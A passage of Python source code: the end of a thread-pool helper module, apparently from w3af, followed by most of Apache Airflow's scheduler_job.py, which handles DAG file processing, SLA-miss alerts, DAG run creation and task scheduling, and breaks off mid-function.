return self.map_async(one_to_many(func), iterable, chunksize).get()
def in_qsize(self):
return self._taskqueue.qsize()
def is_running(self):
return self._state == RUN
def terminate_join(self):
self.terminate()
self.join()
def _join_exited_workers(self):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
if worker.exitcode is not None:
# worker exited
try:
worker.join()
except RuntimeError:
#
# RuntimeError: cannot join thread before it is started
#
# This is a race condition in DaemonProcess.start() which was found
# during some of the test scans I run. The race condition exists
# because we're using Threads for a Pool that was designed to be
# used with real processes: thus there is no worker.exitcode,
# thus it has to be simulated in a race condition-prone way.
#
continue
else:
debug('cleaning up worker %d' % i)
cleaned = True
del self._pool[i]
return cleaned
def finish(self, timeout=120):
"""
Wait until all tasks in the self._inqueue have been processed (the queue
has size == 0) and then call terminate on the Pool.
I know this is not the best way of doing it, but had some dead-lock
issues with:
self.close()
self.join()
:param timeout: Wait up to timeout seconds for the queues to be empty
"""
delay = 0.1
for _ in xrange(int(timeout / delay)):
if (self._inqueue.qsize() == 0 and
self._outqueue.qsize() == 0 and
self._taskqueue.qsize() == 0):
break
time.sleep(delay)
self.terminate()
self.join()
def inspect_threads(self):
"""
This method inspects the attributes exposed by the Worker object defined
above and lets us debug the thread pool.
This is useful for answering the question: "What functions are running in
the pool right now?"
:return: Data as a list of dicts, which is usually sent to inspect_data_to_log()
"""
inspect_data = []
for process in self._pool[:]:
worker_state = process.get_state()
inspect_data.append(worker_state)
return inspect_data
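# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of w3af): how the helpers above are commonly
# combined. The functions _demo_double_sum and _demo_square are made up for
# this illustration; since this Pool is thread-based, the callables do not
# need to be picklable.
# ---------------------------------------------------------------------------
def _demo_double_sum(a, b):
    return (a + b) * 2
def _demo_square(x):
    return x * x
def _demo_threadpool_usage():
    pool = Pool(processes=2, worker_names='DemoWorker')
    try:
        # one_to_many lets map() call a multi-argument function with tuples
        results = pool.map(one_to_many(_demo_double_sum), [(1, 2), (3, 4)])
        assert results == [6, 14]
        # return_args keeps the original arguments next to each result
        for args, value in pool.imap_unordered(return_args(_demo_square), [3, 4]):
            assert value == args[0] * args[0]
    finally:
        pool.terminate_join()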
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
# The process that was launched to process the given file path.
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: None; the result of processing the file is sent back
    to the parent process through ``result_channel``
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
log.info("Setting log context for file {}".format(file_path))
# log file created here
set_context(log, file_path)
log.info("Successfully set log context for file {}".format(file_path))
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
log.info("Processing file {}".format(file_path))
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'parsing_processes')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
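# Worked example (hypothetical numbers): with scheduler_health_check_threshold
# set to 30, a SchedulerJob in State.RUNNING whose latest_heartbeat is 45
# seconds old is reported as dead, while one whose heartbeat is 10 seconds old
# is reported as alive.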
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
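# Worked example (hypothetical schedule): for an hourly DAG whose latest
# successful/skipped TI has execution_date 10:00 and whose task has
# sla=timedelta(minutes=5), the loop above starts at dttm=11:00 and records an
# SlaMiss for execution_date 11:00 once utcnow() passes 12:05, i.e. its
# following schedule (12:00) plus the SLA.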
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}</code></pre>
Airflow Web Server URL: {webserver_base_url}
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug, webserver_base_url=conf.get(section='webserver', key='base_url'))
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dags that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
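# Worked example (hypothetical dates): for a daily DAG with catchup enabled and
# last_scheduled_run = 2020-01-01, next_run_date becomes 2020-01-02 and
# period_end becomes 2020-01-03, so the DagRun for execution_date 2020-01-02 is
# only created once utcnow() >= 2020-01-03 00:00, after the data interval it
# covers has fully elapsed.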
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs.append(run)
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of a DagRun is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances in the given states, and
a map from (dag_id, task_id) to # of task instances in the given states
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
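# Illustrative return value (hypothetical data): with three running TIs of
# task_a and one of task_b, both in example_dag, this returns
#   dag_map  == {'example_dag': 4}
#   task_map == {('example_dag', 'task_a'): 3, ('example_dag', 'task_b'): 1}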
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Still handling task %s even though as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
